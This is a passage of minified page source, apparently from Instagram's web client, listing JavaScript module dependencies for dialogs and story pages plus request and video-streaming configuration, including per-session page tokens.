r","CometRelayEF"],"r":["wJ8iTPu","YfY0wDs","XxF9+Kd"]},"be":1},"SecuredActionChallengeCDSPasswordDialog.react":{"r":["680GOIE","ufdnA0a","knSQlgx","pLnuU4P","UQS9J7g","KQGL0hM","vK6wenv","z\/ZV1eT","n2L8zN8","cFQHLlI","PMomXZR","ttiLvDt","s4eF10q","vwkVkFR","BZbiliY","WpvFyQK","Bjrpbc6","DmSJ7nb","pCU+mBr","q6aT0Zl","GJRKAjf","nokq8md","MFw7f6W","W+TDAGO","cr2zOh8","RxMtGJ5","tsYMs7p","vbvXlft","T6r6Egc","oTrpkd6","KBZBs5O","KtZLmG+","wmt6DTl","v7sPgju","NoAZAO0","U\/3Ld\/d","sgs\/F9K","12euusk","r01o1aa"],"rdfds":{"m":["CDSTooltipDeferredImpl.react","CometExceptionDialog.react","SecuredActionTriggerWithAccountID.react","SecuredActionTriggerWithEncryptedContext.react","FDSTooltipDeferredImpl.react"],"r":["+WemAQg"]},"rds":{"m":["FxReauthenticationFalcoEvent","ContextualConfig","BladeRunnerClient","SecuredActionExteriorFalcoEvent","CometRelayEF","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent","CDSToast.react","CometToast.react","MqttLongPollingRunner"],"r":["X2Qra8Y","wJ8iTPu","YfY0wDs","XxF9+Kd","fHUdg2x","qeBm3fk"]},"be":1},"SecuredActionNoChallengeAvailableCDSDialog.react":{"r":["680GOIE","\/NTWV2I","ufdnA0a","UQS9J7g","z\/ZV1eT","cFQHLlI","WpvFyQK","sgs\/F9K"],"rdfds":{"m":["CDSTooltipDeferredImpl.react"],"r":["+WemAQg"]},"rds":{"m":["FbtLogging","CometSuspenseFalcoEvent","ODS","IntlQtEventFalcoEvent"],"r":["YfY0wDs"]},"be":1},"TwoStepVerificationRoot.react":{"r":["680GOIE","hAW\/IbR","ufdnA0a","KZmtGYW","UQS9J7g","vRIf6Oc","+g4Hsus","+WemAQg","GVIxfT8","z\/ZV1eT","cFQHLlI","PMomXZR","bzBvxqm","s4eF10q","aGkefgE","vwkVkFR","XxF9+Kd","8ghYTK\/","WpvFyQK","DmSJ7nb","HBOwAIG","ki+fF7f","J212E5D","nga4cFF","BJQXboE","CJusTSZ","vbvXlft","HQH\/Hrh","9rvGgMZ","xMOR47C","tXLa6jr","ThGTKWs","G\/RswIW","KtZLmG+","U92WFR4","Bv+z1YO","wjwcbKn","sgs\/F9K","X3Zq4bS"],"rdfds":{"m":["CDSTooltipDeferredImpl.react","CometExceptionDialog.react","SecuredActionTriggerWithAccountID.react","SecuredActionTriggerWithEncryptedContext.react","FDSTooltipDeferredImpl.react"]},"rds":{"m":["ContextualConfig","BladeRunnerClient","CometRelayEF","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent","CometToast.react","MqttLongPollingRunner"],"r":["wJ8iTPu","YfY0wDs"]},"be":1},"PolarisGranularCookieControlModalContent.react":{"r":["680GOIE","ufdnA0a","ak2ZGzA","z\/ZV1eT","vbvXlft","sgs\/F9K"],"rds":{"m":["InstagramODSImpl","ContextualConfig","PolarisLogger","BladeRunnerClient","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent","MqttLongPollingRunner"],"r":["wJ8iTPu","YfY0wDs","XxF9+Kd"]},"be":1},"VultureJSSampleRatesLoader":{"r":["L12oFNZ"],"be":1},"PolarisLoggedOutContentWallDialog.react":{"r":["680GOIE","ufdnA0a","z\/ZV1eT","b43zzPr","OVg535O","aKHjxh6","vbvXlft","Wktplt+","sgs\/F9K"],"rdfds":{"m":["CometExceptionDialog.react","FDSTooltipDeferredImpl.react"],"r":["+WemAQg"]},"rds":{"m":["XAsyncRequest","InstagramODSImpl","ContextualConfig","PolarisLogger","BladeRunnerClient","PolarisFBSDK","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","ODS","IntlQtEventFalcoEvent","MqttLongPollingRunner"],"r":["YfY0wDs","wJ8iTPu","XxF9+Kd","FXDnn71","c0LMFtP","oOuVv3x"]},"be":1},"PolarisProfileOtherOptionsEntrypointDialog.react":{"r":["680GOIE","2Lk1vvm","ufdnA0a","+WemAQg","z\/ZV1eT","jl77r19","sJf4a0a","27APACz","ME2FNks","vbvXlft","euqiDzO","pwkHnur","sgs\/F9K"],"rdfds":{"m":["CometExceptionDialog.react","SecuredActionTriggerWithAccountID.react","SecuredActionTriggerWithEncryptedContext.react","FDSTooltipDeferredImpl.react"]},"rds":{"m":["InstagramODSImpl","ContextualConfig","PolarisLogger","BladeRunnerClient","CometRelayEF","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent","CometToast.react","MqttLongPollingRunner"],"r":["wJ8iTPu","YfY0wDs","XxF9+Kd"]},"be":1},"KeyBindDialog.react":{"r":["680GOIE","ufdnA0a","KZmtGYW","jn\/p0dm","2GourbJ","+WemAQg","z\/ZV1eT","GUy78z5","kpvZ794","a6JHKgI","SJd39Gw","DmSJ7nb","vbvXlft","HQH\/Hrh","xMOR47C","KtZLmG+","pFXBCxq","+waDX8D","sgs\/F9K","IdhaZay"],"rdfds":{"m":["FDSTooltipDeferredImpl.react"]},"rds":{"m":["FbtLogging","CometSuspenseFalcoEvent","ODS","IntlQtEventFalcoEvent"],"r":["YfY0wDs"]},"be":1},"XAsyncRequest":{"r":["680GOIE","YfY0wDs","ufdnA0a","XxF9+Kd","c0LMFtP","oOuVv3x","sgs\/F9K"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"]},"be":1},"PolarisActorGatewayDialog.react":{"r":["680GOIE","ufdnA0a","cKR+OCs","+WemAQg","z\/ZV1eT","J212E5D","kLnz7V1","vbvXlft","a\/1e86Q","wjwcbKn","sgs\/F9K"],"rdfds":{"m":["CometTooltipDeferredImpl.react","CometExceptionDialog.react","VideoPlayerSpinner.react","VideoPlayerCaptionsArea.react","oz-player","SecuredActionTriggerWithAccountID.react","SecuredActionTriggerWithEncryptedContext.react","FDSTooltipDeferredImpl.react"],"r":["Pboc6+2"]},"rds":{"m":["XAsyncRequest","InstagramODSImpl","ContextualConfig","PolarisLogger","PolarisUnfollowDialog.react","BladeRunnerClient","PolarisFBSDK","VideoPlayerWithLiveVideoInterruptedOverlay.react","CometRelayEF","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","ODS","IntlQtEventFalcoEvent","CometToast.react","MqttLongPollingRunner"],"r":["YfY0wDs","wJ8iTPu","XxF9+Kd","FXDnn71","c0LMFtP","oOuVv3x"]},"be":1},"PolarisNidoEnrollmentDialog.react":{"r":["Z79Apzl","680GOIE","ufdnA0a","KJ+69wK","+WemAQg","bzBvxqm","z\/ZV1eT","9ur9Im7","vwkVkFR","kLnz7V1","sgs\/F9K","UQ1s16d"],"rds":{"m":["InstagramODSImpl","ContextualConfig","PolarisLogger","BladeRunnerClient","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent","MqttLongPollingRunner"],"r":["wJ8iTPu","YfY0wDs","XxF9+Kd"]},"be":1},"PolarisBlockDialogContainer.react":{"r":["680GOIE","ufdnA0a","+WemAQg","z\/ZV1eT","Sd25GU6","vbvXlft","euqiDzO","sgs\/F9K"],"rds":{"m":["InstagramODSImpl","ContextualConfig","PolarisLogger","BladeRunnerClient","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent","MqttLongPollingRunner"],"r":["wJ8iTPu","YfY0wDs","XxF9+Kd"]},"be":1},"PolarisLoggedOutIntentDialog.react":{"r":["680GOIE","ufdnA0a","+WemAQg","YmC\/7Lh","z\/ZV1eT","woI9yTK","5atnOB5","uqKoUc5","Sd25GU6","aKHjxh6","vbvXlft","Wktplt+","sgs\/F9K"],"rdfds":{"m":["CometExceptionDialog.react","FDSTooltipDeferredImpl.react"]},"rds":{"m":["XAsyncRequest","InstagramODSImpl","ContextualConfig","PolarisLogger","BladeRunnerClient","PolarisFBSDK","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent","MqttLongPollingRunner"],"r":["YfY0wDs","wJ8iTPu","XxF9+Kd","FXDnn71","c0LMFtP","oOuVv3x"]},"be":1},"CAAFetaSavePasswordInterstitialDialog.react":{"r":["680GOIE","TM+Et\/5","ufdnA0a","UQS9J7g","ifRj6vZ","KQGL0hM","z\/ZV1eT","n2L8zN8","cFQHLlI","s4eF10q","WpvFyQK","+UEIrP3","ZpOblqZ","VNPgzTm","kLnz7V1","vbvXlft","uEasYsv","s70Y0up","sgs\/F9K"],"rdfds":{"m":["CDSTooltipDeferredImpl.react","CAAFetaSavePasswordInterstitial.react"],"r":["+WemAQg","yIso0ch","q6aT0Zl","kEJE72M","xeMNMrj","gIZQ3gi"]},"rds":{"m":["XAsyncRequest","InstagramODSImpl","ContextualConfig","PolarisLogger","BladeRunnerClient","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent","MqttLongPollingRunner"],"r":["YfY0wDs","wJ8iTPu","XxF9+Kd","c0LMFtP","oOuVv3x"]},"be":1},"PolarisNidoGraduationDialog.react":{"r":["680GOIE","ufdnA0a","bKgIrEo","KJ+69wK","+WemAQg","bzBvxqm","z\/ZV1eT","vwkVkFR","xFzArwt","kLnz7V1","sgs\/F9K","UQ1s16d"],"rds":{"m":["InstagramODSImpl","ContextualConfig","PolarisLogger","BladeRunnerClient","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent","MqttLongPollingRunner"],"r":["wJ8iTPu","YfY0wDs","XxF9+Kd"]},"be":1},"FXFetaToSDialog.react":{"r":["680GOIE","G38htn8","ufdnA0a","pLnuU4P","UQS9J7g","gSPMxCm","88mSqvD","P5C76ga","6EPXgdn","KQGL0hM","GVIxfT8","IKrNQ5r","z\/ZV1eT","6nWyjIp","cFQHLlI","DiSmcAj","8ghYTK\/","WpvFyQK","Bjrpbc6","xpYOiZL","mpXTvbQ","pCU+mBr","q6aT0Zl","nokq8md","MFw7f6W","Fk4+LK5","\/+E2pTs","AWFML7C","cr2zOh8","LaNsK3o","vbvXlft","KtZLmG+","U92WFR4","sgs\/F9K","q78dA45","pMj+oD2","kLnz7V1"],"rdfds":{"m":["CDSTooltipDeferredImpl.react"],"r":["+WemAQg"]},"rds":{"m":["FbtLogging","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent"],"r":["YfY0wDs"]},"be":1},"SaharaCometConsentFlowContextualRoot.react":{"r":["680GOIE","ufdnA0a","KZmtGYW","FRMc3Kb","3fx6UYf","pLnuU4P","UQS9J7g","z8mkNdu","9n2X0Kl","Yzy+WPU","Ns9X1iz","F8O1kbT","88mSqvD","+WemAQg","KQGL0hM","GVIxfT8","z\/ZV1eT","n2L8zN8","cFQHLlI","eTgOGxy","8i2Nm3k","s4eF10q","9ur9Im7","SAA+nXN","kpvZ794","vwkVkFR","TRBcXk8","ESDmXFx","WpvFyQK","DO0DIMu","q6aT0Zl","ki+fF7f","LSPTPMz","p0o24Pk","DkHD\/\/x","kLnz7V1","vbvXlft","TpfwNJU","CpRrKV7","KBZBs5O","KtZLmG+","EkhRgbQ","U92WFR4","NoAZAO0","wjwcbKn","sgs\/F9K"],"rdfds":{"m":["CDSTooltipDeferredImpl.react","CometExceptionDialog.react","SecuredActionTriggerWithAccountID.react","SecuredActionTriggerWithEncryptedContext.react","FDSTooltipDeferredImpl.react"]},"rds":{"m":["InstagramODSImpl","ContextualConfig","PolarisLogger","BladeRunnerClient","CometRelayEF","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","ODS","IntlQtEventFalcoEvent","CometToast.react","MqttLongPollingRunner"],"r":["wJ8iTPu","YfY0wDs","XxF9+Kd"]},"be":1},"PolarisBlockDialog.next.react":{"r":["680GOIE","ufdnA0a","+WemAQg","z\/ZV1eT","V3JqY9K","27APACz","euqiDzO","sgs\/F9K"],"rds":{"m":["InstagramODSImpl","ContextualConfig","PolarisLogger","BladeRunnerClient","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent","MqttLongPollingRunner"],"r":["wJ8iTPu","YfY0wDs","XxF9+Kd"]},"be":1},"FXFetaPreMigrationDialog.react":{"r":["680GOIE","G38htn8","ufdnA0a","pLnuU4P","UQS9J7g","gSPMxCm","88mSqvD","6EPXgdn","KQGL0hM","GVIxfT8","z\/ZV1eT","cFQHLlI","PMomXZR","8ghYTK\/","WpvFyQK","Bjrpbc6","xpYOiZL","mpXTvbQ","q6aT0Zl","nokq8md","MFw7f6W","Fk4+LK5","\/+E2pTs","AWFML7C","cr2zOh8","r32UL7F","vbvXlft","KtZLmG+","U92WFR4","sgs\/F9K","q78dA45","gaOrHtK","kLnz7V1"],"rdfds":{"m":["CDSTooltipDeferredImpl.react"],"r":["+WemAQg"]},"rds":{"m":["FbtLogging","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent"],"r":["YfY0wDs"]},"be":1},"FXFetaAutoMigrationPromptDialog.react":{"r":["680GOIE","ufdnA0a","UQS9J7g","88mSqvD","KQGL0hM","GVIxfT8","z\/ZV1eT","n2L8zN8","cFQHLlI","PMomXZR","8i2Nm3k","s4eF10q","BZbiliY","ESDmXFx","WpvFyQK","xpYOiZL","JwfUHps","pCU+mBr","q6aT0Zl","AWFML7C","tsYMs7p","vbvXlft","T6r6Egc","ifci8LL","KtZLmG+","NoAZAO0","sgs\/F9K","q78dA45","ir9vjVL","kLnz7V1"],"rdfds":{"m":["CDSTooltipDeferredImpl.react","CometExceptionDialog.react","SecuredActionTriggerWithAccountID.react","SecuredActionTriggerWithEncryptedContext.react","FDSTooltipDeferredImpl.react"],"r":["+WemAQg"]},"rds":{"m":["ContextualConfig","BladeRunnerClient","CometRelayEF","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent","CometToast.react","MqttLongPollingRunner"],"r":["wJ8iTPu","YfY0wDs","XxF9+Kd"]},"be":1},"CometIXTFacebookXfacUniversalTriggerRoot.react":{"r":["680GOIE","cOplohA","ufdnA0a","AHvjowD","Ie4LidB","SCeJI9H","keBlUsV","BDXTzMg","GDrhVlR","+WemAQg","\/DfdRx3","vJH20sm","z\/ZV1eT","ZOIwXyF","UrJSNOG","9oUaCa8","lhm546U","S9g\/v2X","WHhSLLO","w3kXsbM","+yZZvJx","Qi8\/reo","sgs\/F9K","n2L8zN8","FXDnn71","vbvXlft","LuDoC6D"],"rdfds":{"m":["FDSTooltipDeferredImpl.react"]},"rds":{"m":["FbtLogging","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent"],"r":["YfY0wDs"]},"be":1},"PolarisBugReportModal.react":{"r":["680GOIE","ufdnA0a","z\/ZV1eT","wjNxzQ7","DkHD\/\/x","vbvXlft","6YaLNcf","uYO3YMG","aIHm0jZ","sgs\/F9K"],"rds":{"m":["InstagramODSImpl","ContextualConfig","PolarisLogger","LSDatabaseDump","BladeRunnerClient","MWLSIndexedDBDump","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent","MqttLongPollingRunner","WATagsLogger","PersistedQueue","GetLsDatabase","CometExceptionDialog.react","FDSTooltipDeferredImpl.react"],"r":["wJ8iTPu","YfY0wDs","C1DFjNb","GVIxfT8","\/aBxlgD","XxF9+Kd","ktOgdMo","DrIk7xK","c1+3mCj","168OihR","Bjrpbc6","nokq8md","MFw7f6W","u7RlxqU","lZvZ7iW","TYdBqlw","srDZ9vO","JXF14Ob","OCeQZr2","blcA9Ra","G1bGvka","o6etFjP","+WemAQg","jjdOWj3"]},"be":1},"PolarisDesktopStoriesPage.react":{"r":["680GOIE","ufdnA0a","DrIk7xK","viR7ZL2","oxyTRSu","+WemAQg","gMgV2qx","FGzrdA9","1UUUqrw","z\/ZV1eT","kYm0ofR","sJf4a0a","3t0FqRW","Sd25GU6","ki+fF7f","Sajgg3S","8efdAd8","miJXrhb","duO0cRV","Gxp4P3V","vbvXlft","b6cM4OU","sgs\/F9K","ECgwgJ2","C1DFjNb","SPg2d7B","PQul9Ez","GVIxfT8","SvL53uB","sT2zhNt","a\/1e86Q","aIHm0jZ","kLnz7V1"],"rdfds":{"m":["maybeIssueIGDThreadPointQuery","CometExceptionDialog.react","VideoPlayerSpinner.react","VideoPlayerCaptionsArea.react","SecuredActionTriggerWithAccountID.react","SecuredActionTriggerWithEncryptedContext.react","oz-player","FDSTooltipDeferredImpl.react"],"r":["u7RlxqU","OCeQZr2","RMnYulX","168OihR","Pboc6+2"]},"rds":{"m":["XAsyncRequest","InstagramODSImpl","ContextualConfig","PolarisLogger","PolarisStoryModals.react","BladeRunnerClient","CometRelayEF","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","ODS","IntlQtEventFalcoEvent","PolarisDirectMQTT","getSendStoryToInstamadilloRecipient","VideoPlayerWithLiveVideoInterruptedOverlay.react","CometToast.react","PolarisUnfollowDialog.react","PolarisFBSDK","IGCoreModal.react","CometTooltipDeferredImpl.react","MqttLongPollingRunner","LSDatabaseSingletonLazyWrapper","GetLsDatabase","PersistedQueue"],"r":["YfY0wDs","wJ8iTPu","2Lk1vvm","UcU++rF","UTmFS3q","ge\/TmjL","qRv78Su","uqKoUc5","uk+8ZOM","27APACz","woIFjSG","bJ922yg","J212E5D","RxMtGJ5","euqiDzO","C2iVshz","wjwcbKn","XxF9+Kd","n2L8zN8","kYRLqjW","lZvZ7iW","c0LMFtP","oOuVv3x","FXDnn71","jjdOWj3","TYdBqlw"]},"be":1},"PolarisMobileStoriesPage.react":{"r":["680GOIE","ufdnA0a","bjs5pn2","oxyTRSu","gMgV2qx","FGzrdA9","1UUUqrw","z\/ZV1eT","kYm0ofR","oxtwk3g","3t0FqRW","Sd25GU6","ki+fF7f","8efdAd8","miJXrhb","duO0cRV","Gxp4P3V","vbvXlft","euqiDzO","b6cM4OU","sgs\/F9K","C1DFjNb","SPg2d7B","DrIk7xK","+WemAQg","PQul9Ez","GVIxfT8","SvL53uB","sJf4a0a","sT2zhNt","a\/1e86Q","aIHm0jZ","ECgwgJ2","kLnz7V1"],"rdfds":{"m":["maybeIssueIGDThreadPointQuery","CometExceptionDialog.react","VideoPlayerSpinner.react","VideoPlayerCaptionsArea.react","SecuredActionTriggerWithAccountID.react","SecuredActionTriggerWithEncryptedContext.react","oz-player","FDSTooltipDeferredImpl.react"],"r":["u7RlxqU","OCeQZr2","RMnYulX","168OihR","Pboc6+2"]},"rds":{"m":["XAsyncRequest","InstagramODSImpl","ContextualConfig","PolarisLogger","PolarisStoryModals.react","BladeRunnerClient","FbtLogging","DGWRequestStreamClient","CometSuspenseFalcoEvent","IntlQtEventFalcoEvent","ODS","PolarisDirectMQTT","getSendStoryToInstamadilloRecipient","VideoPlayerWithLiveVideoInterruptedOverlay.react","CometRelayEF","PolarisUnfollowDialog.react","PolarisFBSDK","IGCoreModal.react","CometTooltipDeferredImpl.react","MqttLongPollingRunner","LSDatabaseSingletonLazyWrapper","CometToast.react","GetLsDatabase","PersistedQueue"],"r":["YfY0wDs","wJ8iTPu","2Lk1vvm","UcU++rF","UTmFS3q","ge\/TmjL","qRv78Su","uqKoUc5","uk+8ZOM","27APACz","woIFjSG","bJ922yg","J212E5D","Sajgg3S","RxMtGJ5","C2iVshz","wjwcbKn","XxF9+Kd","n2L8zN8","kYRLqjW","lZvZ7iW","c0LMFtP","oOuVv3x","FXDnn71","jjdOWj3","TYdBqlw"]},"be":1}}}]]]}</script>
|
52
|
+
<script type="application/json" data-content-len="39372" data-sjs="">{"require":[["ScheduledServerJS","handle",null,[{"__bbox":{"define":[["cr:8544",["CometIXTMainFacebookXfacUniversalTriggerEntryPoint.entrypoint"],{"__rc":["CometIXTMainFacebookXfacUniversalTriggerEntryPoint.entrypoint",null]},-1],["cr:8592",["useIXTFacebookEntryPointDialog"],{"__rc":["useIXTFacebookEntryPointDialog",null]},-1],["cr:99",[],{"__rc":[null,null]},-1],["cr:355",[],{"__rc":[null,null]},-1],["cr:506",[],{"__rc":[null,null]},-1],["cr:567",["SaharaCometConsentFlowContextualConsentFallbackLoadingStateIGDS.react"],{"__rc":["SaharaCometConsentFlowContextualConsentFallbackLoadingStateIGDS.react",null]},-1],["cr:913",[],{"__rc":[null,null]},-1],["cr:1358",["usePolarisOzImplementation"],{"__rc":["usePolarisOzImplementation",null]},-1],["cr:2336",[],{"__rc":[null,null]},-1],["cr:4149",[],{"__rc":[null,null]},-1],["cr:4596",[],{"__rc":[null,null]},-1],["cr:6094",["useEmptyFunction"],{"__rc":["useEmptyFunction",null]},-1],["cr:7175",[],{"__rc":[null,null]},-1],["cr:9661",["FXFetaAutoMigrationPromptDialogRootQuery$Parameters.instagram"],{"__rc":["FXFetaAutoMigrationPromptDialogRootQuery$Parameters.instagram",null]},-1],["cr:9693",["FXFetaPreMigrationDialogRootQuery$Parameters.instagram"],{"__rc":["FXFetaPreMigrationDialogRootQuery$Parameters.instagram",null]},-1],["cr:9719",["FXFetaToSDialogRootQuery$Parameters.instagram"],{"__rc":["FXFetaToSDialogRootQuery$Parameters.instagram",null]},-1],["cr:10818",[],{"__rc":[null,null]},-1],["cr:13141",["IGWebSession"],{"__rc":["IGWebSession",null]},-1],["cr:964538",[],{"__rc":[null,null]},-1],["cr:1453865",[],{"__rc":[null,null]},-1],["cr:1473550",[],{"__rc":[null,null]},-1],["cr:1672302",[],{"__rc":[null,null]},-1],["cr:1680308",[],{"__rc":[null,null]},-1],["cr:1724253",[],{"__rc":[null,null]},-1],["cr:1954434",[],{"__rc":[null,null]},-1],["cr:710",[],{"__rc":[null,null]},-1],["MRequestConfig",[],{"dtsg":{"token":"NAcOUMQxW0fBqE9zcIRxNYTPwtNEpd3_GVl_QadSnJgaiVOX4Yo9MgA:0:0","valid_for":86400,"expire":1742248837},"dtsg_ag":{"token":"AQwL4VF5NlNtlf_GS8yvgKfZEx5oFOM31MG1jnzs6E1bvHMX:0:0","valid_for":604800,"expire":1742767237},"lsd":"AVoAPuZUzO8","checkResponseOrigin":true,"checkResponseToken":true,"cleanFinishedRequest":false,"cleanFinishedPrefetchRequests":false,"ajaxResponseToken":{"secret":"Q9KTz1btL6iRL1LXZgsEPDjkOwSQQJGt","encrypted":"AYkUP3PtFJrXKcIu5dNBMi0mJ31oBKdmbc1DoctOvZxnYwa2OFMXKU6jEjyFJoLQ5LxC5Ac5Zbd579gmhQOkoe5tlioVdgueB9_b-KCnMJ2HCg"}},51],["VideoPlayerStateBasedLoggingEvents",[],{"StateBasedLoggingEventNames":["cancelled_requested_playing","caption_change","chromecast_availability_checked","chromecast_not_supported","chromecast_button_visible","entered_fs","entered_hd","error","exited_fs","exited_hd","finished_loading","finished_playing","headset_connected","headset_disconnected","host_error","muted","paused","player_format_changed","quality_change","requested_playing","scrubbed","seeked","started_playing","unmuted","unpaused","volume_changed","volume_decrease","volume_increase","viewport_rotated","viewport_zoomed","heading_reset","guide_entered","guide_exited","spherical_fallback_entered","played_for_three_seconds","commercial_break_offscreen","commercial_break_onscreen","ad_break_starting_indicator","ad_break_non_interruptive_ad_start","ad_break_non_interruptive_ad_click","ad_break_pre_roll_ad_start","ad_break_tap_on_trailer","ad_break_tap_start_from_trailer","representation_ended","heart_beat","stale","viewability_changed","video_logging_session_timeout","video_logging_session_wakeup","retry_on_error","playback_speed_changed","video_warmup_evicted","suppress_video_off","suppress_video_on","error_recovery_attempt","displayed_frames","video_viewability_updated"]},3462],["VideoPlayerContextSensitiveConfigPayload",[],{"context_sensitive_values":{"buffering_overflow_threshold":[{"value":3.0832147598267,"contexts":[{"name":"connection_quality","value":"POOR"}]},{"value":3.0832147598267,"contexts":[{"name":"connection_quality","value":"MODERATE"}]}],"enable_request_pipelining_for_live":[{"value":false,"contexts":[{"name":"latency_level","value":"low"}]}],"initial_stream_buffer_size_float":[{"value":10,"contexts":[{"name":"is_ad","value":true}]}],"is_low_latency":[{"value":true,"contexts":[{"name":"latency_level","value":"low"}]}],"live_stream_buffer_size_float":[{"value":10,"contexts":[{"name":"content_category","value":"esports"}]},{"value":6.5,"contexts":[{"name":"content_category","value":"gaming"}]}],"num_predictive_segments":[{"value":4,"contexts":[{"name":"latency_level","value":"low"}]}],"oz_www_append_byte_target_without_range":[{"value":1,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_bandwidth_ignore_on_stream_write_samples":[{"value":true,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_bandwidth_use_response_time_adjustment":[{"value":true,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_buffer_ahead_target":[{"value":10,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"content_category","value":"gaming"}]},{"value":14,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"is_latency_sensitive_broadcast","value":true}]},{"value":24,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_catchup_timeout_after_buffering_sec":[{"value":0.001,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_catchup_timeout_after_play_sec":[{"value":30,"contexts":[{"name":"fbls_tier","value":"user"}]}],"oz_www_ignore_reset_after_seek_if_bufferahead":[{"value":true,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_in_play_buffer_overflow_target":[{"value":1,"contexts":[{"name":"connection_quality","value":"POOR"}]},{"value":1,"contexts":[{"name":"connection_quality","value":"MODERATE"}]}],"oz_www_latencymanager_stalled_edgelatency_sec":[{"value":2,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"latency_level","value":"ultra-low"}]},{"value":6,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"content_category","value":"gaming"}]},{"value":10,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"is_latency_sensitive_broadcast","value":true}]},{"value":18,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_latencymanager_stalled_edgelatency_sec_on":[{"value":false,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"latency_level","value":"ultra-low"}]},{"value":true,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_live_initial_playback_position":[{"value":-14,"contexts":[{"name":"content_category","value":"gaming"}]}],"oz_www_live_rewind_seek_to_live_delta":[{"value":4,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"is_latency_sensitive_broadcast","value":true}]}],"oz_www_minimum_bytes_to_sample_on_close":[{"value":10000,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_ms_promise_for_null":[{"value":true,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_ms_promise_for_null_ms":[{"value":1000,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_network_reload_mpd_json":[{"value":"[\"504\", \"404\"]","contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_network_retry_intervals_json":[{"value":"{\"0\": 1000, \"404\": 2000, \"502\": 1000, \"503\": 1000, \"504\": 1000, \"20\": 1, \"429\": 2000}","contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_overwrite_live_time_range_block_margin":[{"value":5,"contexts":[{"name":"latency_level","value":"low"},{"name":"fbls_tier","value":"user"}]}],"oz_www_overwrite_livehead_fall_behind_block_threshold":[{"value":10,"contexts":[{"name":"latency_level","value":"low"}]}],"oz_www_pdash_download_cursor_catchup_threshold_gop_multiplier":[{"value":1,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_pdash_download_cursor_catchup_threshold_sec":[{"value":1,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"latency_level","value":"ultra-low"}]},{"value":2,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"is_latency_sensitive_broadcast","value":true},{"name":"latency_level","value":"low"}]},{"value":6,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"is_latency_sensitive_broadcast","value":true}]},{"value":10,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"latency_level","value":"low"}]},{"value":10,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_pdash_download_cursor_catchup_tolerance_sec":[{"value":1,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_pdash_use_pdash_segmentlocator":[{"value":true,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_per_stream_duration_target":[{"value":0.5,"contexts":[{"name":"connection_quality","value":"GOOD"}]},{"value":0.5,"contexts":[{"name":"connection_quality","value":"EXCELLENT"}]}],"oz_www_playback_speed_latency_slowdown_adjustment_rate":[{"value":0.2,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_playback_speed_latency_speedup_adjustment_rate":[{"value":0.1,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_playback_speed_min_buffer_sec":[{"value":0.5,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"latency_level","value":"ultra-low"}]}],"oz_www_player_emit_mpdparsed_early":[{"value":true,"contexts":[{"name":"is_live","value":true}]}],"oz_www_player_emit_mpdready_early":[{"value":true,"contexts":[{"name":"is_live","value":true}]}],"oz_www_player_formats_for_low_latency":[{"value":"[\"*\"]","contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_playhead_manager_buffered_auto_seek_playhead_slack":[{"value":0.01,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_playhead_manager_buffered_numerical_error":[{"value":0,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_playhead_manager_clamp_initial_playback_position":[{"value":true,"contexts":[{"name":"streaming_implementat